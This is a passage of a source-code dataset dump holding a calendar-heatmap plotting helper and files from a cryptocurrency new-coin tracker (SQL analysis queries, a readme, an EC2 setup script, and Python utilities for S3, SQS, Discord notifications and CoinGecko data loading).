"UTF-8", "text": "kamene==0.32\n" } ]
3
ininjame/pythonproj
https://github.com/ininjame/pythonproj
d0c633da2f57c9061daaa77e1e15981268c36f34
4bb5d06501ef9a237d53ee4fbea1dae5a94d104e
fe9c1bf68f38c0afe779e9ba5ebdbad7aa9c0e53
refs/heads/master
2023-01-21T21:49:54.042671
2022-12-19T15:45:59
2022-12-19T15:45:59
139,323,097
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5204760432243347, "alphanum_fraction": 0.5505775213241577, "avg_line_length": 35.177215576171875, "blob_id": "c18c6c199beb60204622f0a0c872db5c7a807582", "content_id": "9ff49e72d9e8742bedb595e868243b0faad8dd3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2857, "license_type": "no_license", "max_line_length": 91, "num_lines": 79, "path": "/data_analysis/lib/calmapLib.py", "repo_name": "ininjame/pythonproj", "src_encoding": "UTF-8", "text": "# ----------------------------------------------------------------------------\n# A modified version of calendar heat map by author Nicolas P. Rougier\n# that accepts data of any size, has function to create input.\n# License: BSD\n# ----------------------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nfrom datetime import datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\n\n\ndef calmap(ax, year, data, col_map='RdYlBu'):\n ax.tick_params('x', length=0, labelsize=\"medium\", which='major')\n ax.tick_params('y', length=0, labelsize=\"x-small\", which='major')\n\n # Month borders\n xticks, labels = [], []\n start = datetime(year,1,1).weekday()\n for month in range(1,13):\n first = datetime(year, month, 1)\n last = first + relativedelta(months=1, days=-1)\n\n y0 = first.weekday()\n y1 = last.weekday()\n x0 = (int(first.strftime(\"%j\"))+start-1)//7\n x1 = (int(last.strftime(\"%j\"))+start-1)//7\n\n P = [ (x0, y0), (x0, 7), (x1, 7),\n (x1, y1+1), (x1+1, y1+1), (x1+1, 0),\n (x0+1, 0), (x0+1, y0) ]\n xticks.append(x0 +(x1-x0+1)/2)\n labels.append(first.strftime(\"%b\"))\n poly = Polygon(P, edgecolor=\"black\", facecolor=\"None\",\n linewidth=1, zorder=20, clip_on=False)\n ax.add_artist(poly)\n \n ax.set_xticks(xticks)\n ax.set_xticklabels(labels)\n ax.set_yticks(0.5 + np.arange(7))\n ax.set_yticklabels([\"Mon\", \"Tue\", \"Wed\", 
\"Thu\", \"Fri\", \"Sat\", \"Sun\"])\n ax.set_title(\"{}\".format(year), weight=\"semibold\")\n \n # Clearing first and last day from the data\n valid = datetime(year, 1, 1).weekday()\n data[:valid,0] = np.nan\n valid = datetime(year, 12, 31).weekday()\n # data[:,x1+1:] = np.nan\n data[valid+1:,x1] = np.nan\n\n # Showing data\n ax.imshow(data, extent=[0,53,0,7], zorder=10, vmin=0, vmax=int(np.nanmax(data)),\n cmap=col_map, origin=\"lower\", alpha=.75)\n\ndef create_input(data, year):\n\n def padding(series, year):\n \"\"\"\n Take pandas series, generate padding and return values as array\n \"\"\"\n days_before = (min(series.index) - datetime(year,1,1)).days\n days_after = ((datetime(year,1,1) + timedelta(days=370)) - max(series.index)).days \n pad_pre = np.empty(days_before)\n pad_pre.fill(np.nan)\n pad_post = np.empty(days_after)\n pad_post.fill(np.nan)\n\n return np.concatenate((pad_pre, series.values, pad_post))\n \n inp_raw = padding(data,year).reshape((53,7)).T\n first = datetime(year,1,1)\n dic = {}\n inp = []\n for i in range(7):\n date = first + timedelta(days=i)\n dic[date.weekday()] = inp_raw[i]\n for i in range(7):\n inp.append(dic[i])\n return np.array(inp)" } ]
1
AdamStormhardtGH/crypto_newcoins_tracker
https://github.com/AdamStormhardtGH/crypto_newcoins_tracker
395f0f23c95e14a1d67ddefea1be170f1792135a
a4d144aff1e8190edab5bfa114e4ae53cc1494ff
320822d0182f0c365b79bbde9e3c5c55845bbe94
refs/heads/master
2023-09-05T06:11:22.945747
2021-11-20T22:18:24
2021-11-20T22:18:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6836923360824585, "alphanum_fraction": 0.6966153979301453, "avg_line_length": 21.8873233795166, "blob_id": "13610dca0e21edb1d959ab87c40a7dc057c07f4a", "content_id": "b448e1fd1e7421afcde4485717e3e855a088c026", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1625, "license_type": "no_license", "max_line_length": 86, "num_lines": 71, "path": "/src/sql/coin_recommendations.sql", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "/* \n\nProvide an overview for all coins, with key metrics:\n- first day added in db\n- latest day we have data for\n- average volume across the data we have\n- latest volume\n- TODO: week this coin belongs to once it's got 7 days or more of data\n- TODO: threshold met of 100m?\n\n*/\n\n-- View Example\nCREATE OR REPLACE VIEW coin_recommendations AS --create table \nSELECT distinct \n\nid, \nsymbol,\n\"name\",\nadded_date,\nextract(week from (added_date + INTERVAL '6' DAY)) as week_num,\n \nlatest_price,\nlatest_total_volumes,\naverage_total_volumes,\nlatest_date\n\n\n-- added_date + interval '24' hour as day_plus1,\n-- now() as now\n\n\n\nFROM \"coin_analysis\".\"watchlist\"\ninner join (\n select \n id as wlid,\n last_value(prices)\n over(partition by id\n order by \"date\" \n rows between unbounded preceding and unbounded following) as latest_price,\n last_value(total_volumes)\n over(partition by id\n order by \"date\" \n rows between unbounded preceding and unbounded following) as latest_total_volumes,\n last_value(\"date\")\n over(partition by id\n order by \"date\" \n rows between unbounded preceding and unbounded following) as latest_date\n \n \n \n \n from \"coin_analysis\".\"watched-coin-data\" \n \n \n ) latest_report on latest_report.wlid = \"coin_analysis\".\"watchlist\".id\n \n left join (\n \n select \n id as avg_id, \n avg(total_volumes) as average_total_volumes\n from \"coin_analysis\".\"watched-coin-data\" \n 
group by id\n ) average_report on average_report.avg_id = \"coin_analysis\".\"watchlist\".id\n \n\nwhere (added_date + interval '24' hour)< now()\nand latest_total_volumes > 1300000\nand latest_price < 0.003\n" }, { "alpha_fraction": 0.7262703776359558, "alphanum_fraction": 0.7535954117774963, "avg_line_length": 26.8266658782959, "blob_id": "12f64a15ff2a9e7f2d05a3aefc5340eb3ea0c28a", "content_id": "70664d9359a7517845382ff70eb09722a9808582", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 169, "num_lines": 75, "path": "/readme.md", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "# overview\n\n\n\n\n## Job 1 - Pull Market list snapshot of all avaialable coins\n\n`marketsnapshot.get_market_snapshot()`\n\n1. Get list of all available coins ( /coins/list)\n2. add a timestamp for us to track dates\n3. output as json line delimited data to s3/gcp\n4. return success or failure\n\n## Job 2 - Compare with yesterday to find new coins\n\n`compareyesterday.compare_yesterday_and_today()`\n\nThis job will check the bucket path associated with the time of execution (UTC)\neg. if execution at midnight UTC on November 11, 2021, the path will look for:\n `<bucket>/marketlist/2021-11-11-coinlist.json` - today\n `<bucket>/marketlist/2021-11-10-coinlist.json` - yesterday\n\nTODO:\n- Fallback to prior day if path does not exist x3 days\n- graceful exit if no comparison date exists\n\n1. Loads today's market list snapshop based on execution date\n2. Loads yesterday's market list snapshop based on execution date\n3. Compares the 2 sets of data, looking for new coins which were not in Yesterday's list\n4. Adds today's timestamp into the payload\n5. Writes the output of entries into a 'watch' list bucket `<bucket>/watchlist/2021-11-11-newcoins.json`\n4. 
return success or failure\n\n\n## Job 3 - Pull Today's Details for watched coins\n\nThis job will pull the market price and other details like volume etc for a specific coin and for each \n\n\n\n--------\n\n## Setting up for lambda deployment\n\nrun `pip install -r requirements.txt --target ./package` to install all required packages listed in the requirements.txt to a local directory. This helps us deploy a zip\n\n\n\n\n## setting up for local deployment\n\nhere's the env file you should make (.env in your root)\n```\nBUCKET = \"coin-analysis-data-ar-staging\"\nSNAPSHOT_PATH = \"snapshots\"\nSNAPSHOT_FILENAME = \"snapshot.json\"\n\nWATCHLIST_PATH = \"watchlist\"\nWATCHLIST_FILENAME = \"watchlist.json\"\n\nCOINS_PATH = \"coins\"\nCOINS_FILENAME = \"watchlist.json\"\n\n\nQUERY_LOGIC_VOLUME = 1300000\nQUERY_LOGIC_PRICE = 0.003\n\nATHENA_DATABASE = \"coin_analysis\"\nATHENA_WATCHLIST_TABLE = \"watchlist\"\nATHENA_MARKETDETAILS_TABLE = \"marketdetails\"\n\nDISCORD_BOT_WEBHOOK = \"<hook here>\n\n```" }, { "alpha_fraction": 0.64449542760849, "alphanum_fraction": 0.6530963182449341, "avg_line_length": 18.795454025268555, "blob_id": "a53650a136dbdb2c5ce0f1ab815ba8498ea75c94", "content_id": "76b59303ad6da6659dbe54451ff86b6050f2deb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 141, "num_lines": 88, "path": "/src/sql/7day_coin_data_with_average.sql", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\n\n/*\n7 day market volume average for new coins.\nThis is used as a source table for another query - \n\nIncludes:\n- Date of the 1st Day\n- Date of the 7th Day\n- 7 day volume average \n- Coin symbol\n\nputs this into a new table called '7day_coins_wdate'\n*/ \n\n\nwith simpletable as (\n\nselect \n\n\nucdcc.\"Date\",\nucdcc.symbol,\n--avg(ucdcc.volume) as volume_avg_day_7,\nucdcc.volume,\n--ucdcc.price\n\nfirst_value 
(ucdcc.\"price\") \nOVER(\n PARTITION BY ucdcc.\"symbol\"\n ORDER BY ucdcc.\"Date\" desc\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) price_at_day7,\n\nfirst_value (ucdcc.\"Date\") \nOVER(\n PARTITION BY ucdcc.\"symbol\"\n ORDER BY ucdcc.\"Date\" desc\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) date_at_day7\n\nfrom public.updated_crypto_data_coingecko_csv ucdcc \n\ninner join (\n\nselect \n\nsymbol,\nfirst_value (\"Date\") \n OVER(\n PARTITION BY \"symbol\"\n ORDER BY \"Date\"\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) first_day,\nfirst_value (\"Date\") \n OVER(\n PARTITION BY \"symbol\"\n ORDER BY \"Date\"\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) + interval '7 day' last_day\n\nfrom public.updated_crypto_data_coingecko_csv ucdcc2 \n\n \n ) windows on windows.symbol = ucdcc.symbol and ucdcc.\"Date\" >= windows.first_day::TIMESTAMP and ucdcc.\"Date\" <= windows.last_day::TIMESTAMP\n \n-- group by ucdcc.symbol, ucdcc.volume, ucdcc.price, ucdcc.\"Date\"\n \n)\n\nselect \n\nsymbol,\navg(volume) as average_volume,\nprice_at_day7,\ndate_at_day7\n\nINTO public.\"7day_coins_wdate\"\nfrom simpletable\ngroup by symbol, price_at_day7, date_at_day7\n\n;\n" }, { "alpha_fraction": 0.7655677795410156, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 21.83333396911621, "blob_id": "077c94d71e5f7624fcbd4a59ebef69e6c9d7f3eb", "content_id": "7f4a975c9b0a199508ed9039a6a94f340883236b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 273, "license_type": "no_license", "max_line_length": 75, "num_lines": 12, "path": "/ec2_dailyupdate.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nscript for the ec2 instance to run daily updates and do its notifcation etc\nrun this on a cron\n\"\"\"\n\nimport lambda_function\nfrom src import 
daily_check\n\nlambda_function.lambda_handler(\"daily\",\"\")\ndaily_check.orchestrate_daily_coin_check()\n\nprint(\"finished daily update\")" }, { "alpha_fraction": 0.5991329550743103, "alphanum_fraction": 0.6083815097808838, "avg_line_length": 25.929960250854492, "blob_id": "636de803a876c98cbeefe60bfa9c0bc7e91cd1b0", "content_id": "0bb2491594b7eae2055bfe9fe5a5700dc85222fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6920, "license_type": "no_license", "max_line_length": 181, "num_lines": 257, "path": "/src/coin_getter/cgutils.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nShared utilities\n\"\"\"\n\nimport arrow, json, time\nimport re, os\nimport boto3\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef datetime_now():\n \"\"\"\n returns UTC now time\n add .format('YYYY-MM-DD HH:mm:ss ZZ') to convert to ISO\n add .format()\n \"\"\"\n return arrow.utcnow()\n\ndef startofday_epohc_now():\n \"\"\"\n give the epoch of the time at 00:00 hrs in epoch\n \"\"\"\n now_date = arrow.utcnow().format(\"YYYY-MM-DD\")\n now_epoch = arrow.get(now_date).format(\"X\")\n now_epoch = re.sub(r\"\\.0\",\"000\",now_epoch)\n \n return now_epoch\n\ndef partition_path_from_date(input_date):\n \"\"\"\n returns path for s3 partitioning from date:\n eg.\n `2021-11-27 00:00:00`\n becomes: \n `year=2021/month=11/day=27`\n \"\"\"\n date_value = arrow.get(input_date) #expects timestamp\n year = date_value.year\n month = date_value.month\n day = date_value.day\n\n return f\"year={year}/month={month}/day={day}\"\n\n\ndef epoch_to_timestamp(epoch_string):\n \"\"\"\n converts data from epoch to athena friendly timestamp\n \"\"\"\n \n epoch_string_clean = str(int(epoch_string/1000) ) #remove milliseconds\n try:\n formatted_timestamp = arrow.get(epoch_string_clean,\"X\").format(\"YYYY-MM-DD HH:mm:ss\")\n except:\n formatted_timestamp = 
datetime_now().format(\"YYYY-MM-DD HH:mm:ss\")\n return formatted_timestamp\n\n\ndef dict_to_jsonl(dict_input):\n \"\"\"\n takes a dict object and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = json.dumps(dict_input)\n jsonl_contents = re.sub(f\"\\n\",\"\",jsonl_contents)\n return jsonl_contents\n\n\ndef list_of_dicts_to_jsonl(list_input):\n \"\"\"\n takes a list of dict objects and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = \"\"\n for each_entry in list_input:\n jsonl_contents = jsonl_contents + \"\\n\" + json.dumps(each_entry)\n\n \n return jsonl_contents\n\n\ndef write_to_storage(data, bucket, filename_path):\n \"\"\"\"\n will write data to a storage location\n \"\"\"\n\n client = boto3.client('s3')\n return client.put_object(Body=data, Bucket=bucket, Key=filename_path)\n \ndef read_from_storage(bucket, filename_path):\n \"\"\"\n will read data from a storage location *s3\n \"\"\"\n client = boto3.client('s3')\n response = client.get_object(\n Bucket=bucket,\n Key=filename_path,\n )\n return response\n\ndef notify_discord_bot(text_string):\n \"\"\"\n notifies the discord webhook\n \"\"\"\n DISCORD_BOT_WEBHOOK = os.getenv('DISCORD_BOT_WEBHOOK')\n\n list_of_messages = split_string_discord(text_string)\n\n for each_message in list_of_messages:\n time.sleep(.5)\n data = {\n \"content\": str(each_message)\n }\n response = requests.post(url=DISCORD_BOT_WEBHOOK, json=data)\n print(response)\n \n print(f\"notification complete\")\n\n\ndef split_string_discord(input_string,character_limit=1500):\n \"\"\"\n splits a string into chunks for discord notifications\n \"\"\"\n chunks = input_string.split('\\n')\n \n print(chunks)\n\n messages = []\n chunk_string = \"\"\n for each_item in chunks:\n old_chunkstring = chunk_string\n new_chunk_string = f\"{chunk_string}\\n{each_item}\"\n if len(new_chunk_string) > character_limit:\n messages.append(old_chunkstring)\n chunk_string = each_item\n else:\n chunk_string = new_chunk_string \n if each_item == 
chunks[-1]:\n print(\"last message\")\n messages.append(chunk_string)\n \n return messages\n\ndef send_to_sqs(coin_id):\n \"\"\"\n send a message to the sqs queue specified by the environment variable\n \"\"\"\n # Create SQS client\n sqs = boto3.client('sqs')\n\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n # Send message to SQS queue\n response = sqs.send_message(\n QueueUrl=SQS_QUEUE_URL,\n # DelaySeconds=1,\n MessageGroupId=\"coin-getter\",\n MessageDeduplicationId=str(coin_id),\n MessageAttributes={\n 'coin_id': {\n 'DataType': 'String',\n 'StringValue': str(coin_id)\n }\n },\n MessageBody=(\n 'Sent for coin analysis'\n )\n )\n\n print(response['MessageId'])\n\n\ndef read_sqs_message(sqs_payload, key_to_find=\"coin_id\", delivery_method=\"push\"):\n \"\"\"\n will read sqs messages and return the body message \n There are multiple ways to parse messages from sqs, so we need to be aware of the deliverymethod\n delivery_method:\n \"pull\" - we're pulling from the queue\n \"push\" - we're being pushed the data via like a lambda trigger\n \"\"\"\n \n if delivery_method == \"push\":\n data = sqs_payload[\"Records\"][0][\"messageAttributes\"][key_to_find][\"stringValue\"]\n elif delivery_method == \"pull\":\n data = sqs_payload[\"Messages\"][0][\"MessageAttributes\"][key_to_find][\"StringValue\"]\n else:\n raise Exception(f\"Unable to read data from sqs - delivery method {delivery_method} not supported\")\n\n # [\"MessageAttributes\"][key_to_find][\"Value\"]\n # key_we_need = body[\"MessageAttributes\"][key_to_find][\"Value\"]\n return data\n\ndef delete_message_from_queue(ReceiptHandle):\n \"\"\"\n will delete a message from the sqs queue\n response = client.delete_message(\n QueueUrl='string',\n ReceiptHandle='string'\n )\n \"\"\"\n sqs = boto3.client('sqs')\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n response = sqs.delete_message(\n QueueUrl=SQS_QUEUE_URL,\n ReceiptHandle=ReceiptHandle\n )\n return response\n\ndef read_from_sqs_queue():\n \"\"\"\n will read 
a message from the sqs queue\n apparently this can be unreliable, so we should try mulitple times. \n eg. 5 times\n \"\"\"\n sqs = boto3.client('sqs')\n\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n retries = 0\n retries_max = 5\n data_found = False\n attempt_id = f\"{arrow.utcnow().format('X')}-getcoin\"\n data_from_message = None\n while retries < retries_max and data_found == False:\n response = sqs.receive_message(\n QueueUrl=SQS_QUEUE_URL,\n AttributeNames=[\n \n ],\n MessageAttributeNames=[\n 'coin_id',\n ],\n MaxNumberOfMessages=1,\n VisibilityTimeout=123,\n WaitTimeSeconds=10,\n ReceiveRequestAttemptId=attempt_id\n )\n try:\n data_from_message = read_sqs_message(sqs_payload=response, key_to_find=\"coin_id\", delivery_method=\"pull\") #[\"Messages\"][0][\"MessageAttributes\"][\"coin_id\"][\"StringValue\"]\n data_found = True\n print(f\"FOUND {data_from_message}\")\n except:\n print(\"did not find\")\n retries = retries + 1\n\n\n return data_from_message\n\n\n # except Exception as e:\n # print(f\"unable to parse {key_to_find} from sqs message: {sqs_payload} \")\n # exit()\n\n\n# send_to_sqs('adam')\n# read_from_sqs_queue()" }, { "alpha_fraction": 0.7446808218955994, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 14.833333015441895, "blob_id": "f79e2d22a7d1f0ce8d276c09a2598c9368f9b741", "content_id": "af8890e59400615b2e410180b1409fe8ca5a3da0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 42, "num_lines": 6, "path": "/daily.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nfor daily runs\n\"\"\"\nfrom src import daily_check\n\ndaily_check.orchestrate_daily_coin_check()" }, { "alpha_fraction": 0.7396694421768188, "alphanum_fraction": 0.7520661354064941, "avg_line_length": 17.69230842590332, "blob_id": "51a5a1f01a032cc9dc80c5658dc179d9d343d948", "content_id": 
"54e6acdfd8c7880223801323869e4b5b4f62201d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 242, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/ec2/install_script.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#in /home/ec2-user/\n\nsudo yum update -y\nsudo yum install git -y\n\ncd /home/ec2-user/\ngit clone https://github.com/AdamRuddGH/crypto_newcoins_tracker.git \ncd crypto_newcoins_tracker\npip3 install -r requirements.txt\n\n./setup_cron.sh" }, { "alpha_fraction": 0.6764705777168274, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 10.333333015441895, "blob_id": "52df864e273d4ad2cf52d203e3d32e2cce08af5c", "content_id": "581160575a4e97b85dea5c529526409c23be8904", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 34, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/ec2/setup_cron.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#sets up the cronjob\n" }, { "alpha_fraction": 0.6323046684265137, "alphanum_fraction": 0.6605384349822998, "avg_line_length": 23.95081901550293, "blob_id": "1a312177ea345eecde0708cd220ca0985a899831", "content_id": "dfbdffbd156ce034b6af0636480ebbb345682d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 126, "num_lines": 61, "path": "/src/sql/Weekly_buy_strategy.sql", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\n\n/*\nWeekly Buy strategy: \n- Once a coin has 7 days of volume available, we put it into consideration for a purchase at the end of the week(eg. 
Saturday)\n- We select coin with the highest volume coin for that week\n- We buy that coin\n*/\n\n\nwith report as (\n with calc_weekbuy as(\n with base_table as (\n select *,\n extract(week from cast(date_at_day7 as date)) as week_num,\n extract(year from cast(date_at_day7 as date)) as year_num,\n to_date(to_char(date_at_day7, 'IYYY-IW'),'iyyy-iw') + interval '6 day' as year_week\n\n from \"7day_coins_wdate\" dcw \n where date_at_day7 > CAST('2020-01-01' as date)\n )\n\n select \n distinct\n\n (FIRST_VALUE ( symbol ) OVER ( partition by year_week ORDER BY price_at_day7 desc ) ) as week_winner,\n year_week\n\n from base_table \n order by year_week asc \n )\n\nselect \ndistinct\n* \n\nfrom \ncalc_weekbuy\n\ninner join (\n\nselect \nsymbol,\n\"Date\",\nprice,\n(FIRST_VALUE ( \"price\" ) OVER ( partition by \"symbol\" ORDER BY \"Date\" desc ) ) as latest_price,\n(FIRST_VALUE ( \"price\" ) OVER ( partition by \"symbol\" ORDER BY \"Date\" desc ) - price) / price +1 as price_change_perc\n\nfrom public.updated_crypto_data_coingecko_csv ucdcc \nwhere price >0\n) j on j.symbol = calc_weekbuy.week_winner and j.\"Date\" = calc_weekbuy.year_week\n\norder by \"Date\" asc) -- 100185.74394816707%\n\n\nselect sum(price_change_perc) as gainz,\n count(1) as count_of_payments,\n 420*count(1) as \"cost\",\n sum(price_change_perc)*120 as \"money_gains\"\n\n\nfrom report\n;" }, { "alpha_fraction": 0.5979381203651428, "alphanum_fraction": 0.7525773048400879, "avg_line_length": 15.333333015441895, "blob_id": "e4f89108184b7797fa489aff51e2e76e5337e777", "content_id": "6ef1a1e31777aa131435326ed2bd3e52055551a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 97, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/requirements.txt", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": 
"pycoingecko==2.2.0\narrow\nsuper-json-normalize==0.1.0\nboto3==1.19.7\npython-dotenv==0.19.1\nrequests" }, { "alpha_fraction": 0.6544222831726074, "alphanum_fraction": 0.6576319336891174, "avg_line_length": 29.824174880981445, "blob_id": "7375a85ebe75ce6fc874d0f39ee33064951631cd", "content_id": "7e55473e509ad721239d3faaf433a6daefae62d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2804, "license_type": "no_license", "max_line_length": 99, "num_lines": 91, "path": "/src/compareyesterday.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\ncompares yesterday's markets with today. Creates a series of coins to listen to based in the delta\n\"\"\"\nimport arrow\nfrom . import utils\nimport os \n\nimport json\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\n\ndef read_snapshot_from_date(supplied_date):\n \"\"\"\n loads the snapshot from s3 based on current date\n expects an arrow datetime object, but if it doesn't exist it'll pull today's date from datetime\n \"\"\"\n BUCKET = os.getenv('BUCKET')\n SNAPSHOT_PATH = os.getenv('SNAPSHOT_PATH')\n SNAPSHOT_FILENAME = os.getenv('SNAPSHOT_FILENAME')\n \n year = supplied_date.year\n month = supplied_date.month\n day = supplied_date.day\n\n snapshot_path = f\"{SNAPSHOT_PATH}/year={year}/month={month}/day={day}/{SNAPSHOT_FILENAME}\"\n\n s3_file = utils.read_from_storage(bucket = BUCKET, filename_path=snapshot_path)\n s3_file_data = json.loads(s3_file['Body'].read())\n \n return s3_file_data\n\n\n\ndef compare_yesterday_and_today():\n \"\"\"\n orchestrates the comparison of date between dates\n returns the delta as a list with the watchlist snapshot date in each object within\n results will end up int he watchlist path within the specified bucket\n \"\"\"\n\n today = utils.datetime_now()\n yesterday = utils.datetime_now().shift(days=-1)\n\n today_data = read_snapshot_from_date(today)\n yesterday_data = 
read_snapshot_from_date(yesterday)\n delta = []\n\n #iterate through all coins in list and look for new ones\n for each_coin in today_data[\"data\"]:\n match = False\n for each_coin_yesterday in yesterday_data[\"data\"]:\n if each_coin[\"id\"] == each_coin_yesterday[\"id\"]:\n match = True\n if match == False:\n each_coin[\"added_date\"] = today_data[\"date\"]\n delta.append(each_coin)\n\n if len(delta) > 0:\n # print(f\"found coins: {delta}\")\n clean_names = []\n for each in delta:\n clean_names.append(each[\"name\"])\n status = write_delta_to_watch_location(delta_list=delta, date_value=today)\n return clean_names\n else:\n return [\"No new coins today\"]\n\n\ndef write_delta_to_watch_location(delta_list,date_value):\n \"\"\"\n will take a list (ideally with the deltas from 2 dates) and will write to watch location (s3)\n \"\"\"\n\n BUCKET = os.getenv('BUCKET')\n SNAPSHOT_PATH = os.getenv('WATCHLIST_PATH')\n SNAPSHOT_FILENAME = f\"{os.getenv('WATCHLIST_FILENAME')}\"\n\n year = date_value.year\n month = date_value.month\n day = date_value.day\n\n path = f\"{SNAPSHOT_PATH}/year={year}/month={month}/day={day}/{SNAPSHOT_FILENAME}\"\n\n delta_jsonl = utils.list_of_dicts_to_jsonl(delta_list)\n status = utils.write_to_storage(data=delta_jsonl, bucket=BUCKET, filename_path=path)\n\n return status\n\n# print( compare_yesterday_and_today() )" }, { "alpha_fraction": 0.6063545346260071, "alphanum_fraction": 0.6116968989372253, "avg_line_length": 30.065502166748047, "blob_id": "7cc98251b26338a6c387d060565adc14b0313233", "content_id": "124b609979400a453cc2907e80fbb88174db143a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7115, "license_type": "no_license", "max_line_length": 136, "num_lines": 229, "path": "/adhoc_scripts/historical_load.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nwill get all historic data for all coins as a single jsonld\nuses coingecko 
api\n\nstandalone script\n\n\"\"\"\n\nfrom pycoingecko import CoinGeckoAPI\nfrom requests.models import HTTPError\nimport json, time, os, arrow, datetime\nimport boto3\nimport requests\nimport gzip\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef get_coins_details(coin_id ):\n \"\"\"\n endpoint for getting data for coins details\n pulled out into its own component so we can easily replace \n end_date is required. this allows us to cap the report in days\n \"\"\"\n print(f\"getting coin details for: {coin_id}\")\n cg = CoinGeckoAPI()\n\n max_retries = 10\n retry_number = 0\n wait = 61\n success = False\n time.sleep(1.1)\n coin_details = None\n while success == False and retry_number < max_retries:\n try:\n coin_details = cg.get_coin_market_chart_by_id(id=coin_id,vs_currency=\"aud\", days=\"max\", interval=\"daily\") #get the 24 hour \n success = True\n except HTTPError as e:\n if e.response.status_code == 429:\n retry_number = retry_number + 1\n print(f\"too many requests error. Waiting {wait} seconds\")\n time.sleep(wait) #wait for this to ease up by waiting for a minute\n else:\n break\n except Exception:\n notify_discord_bot(f\"error with getting coin marketing chart by id for coin: {coin_id}. Skipping\")\n break\n \n if coin_details:\n historic_coin_details_list = extract_historical_market_value_for_coins(coin_details,coin_id=coin_id, days=\"max\")\n\n return historic_coin_details_list\n else:\n return []\n\n\ndef extract_historical_market_value_for_coins(coin_details,coin_id,days):\n\n print(\"extract_historical_market_value_for_coins()\")\n end_entry = -1 #the entry which isn't the time at the call - looks like range uses the last item the same as a < symbol. 
\n coins_to_get_startingpoint = 0\n coin_history = []\n\n #apply the indexing based on start and end\n coin_index = []\n try:\n # print(coin_details[\"prices\"][coins_to_get_startingpoint:end_entry])\n for eachindex in coin_details[\"prices\"][coins_to_get_startingpoint:end_entry]:\n coin_index.append(coin_details[\"prices\"].index(eachindex))\n\n age = 0\n for each_entry in coin_index:\n coin_data = {\n \"id\": coin_id,\n \"date\": epoch_to_timestamp(coin_details[\"prices\"][each_entry][0]), #was -1 for latest. lets just get the minight volume\n \"prices\": coin_details[\"prices\"][each_entry][-1],\n \"market_caps\": coin_details[\"market_caps\"][each_entry][-1],\n \"total_volumes\": coin_details[\"total_volumes\"][each_entry][-1],\n \"age\": age\n }\n age = age + 1\n coin_history.append(coin_data)\n except:\n notify_discord_bot(f\"error with extracting historical market value for coins {coin_id}. Skipping\")\n pass\n\n return coin_history\n \n\n\ndef epoch_to_timestamp(epoch_string):\n \"\"\"\n converts data from epoch to athena friendly timestamp\n \"\"\"\n \n epoch_string_clean = str(int(epoch_string/1000) ) #remove milliseconds\n try:\n formatted_timestamp = arrow.get(epoch_string_clean,\"X\").format(\"YYYY-MM-DD HH:mm:ss\")\n 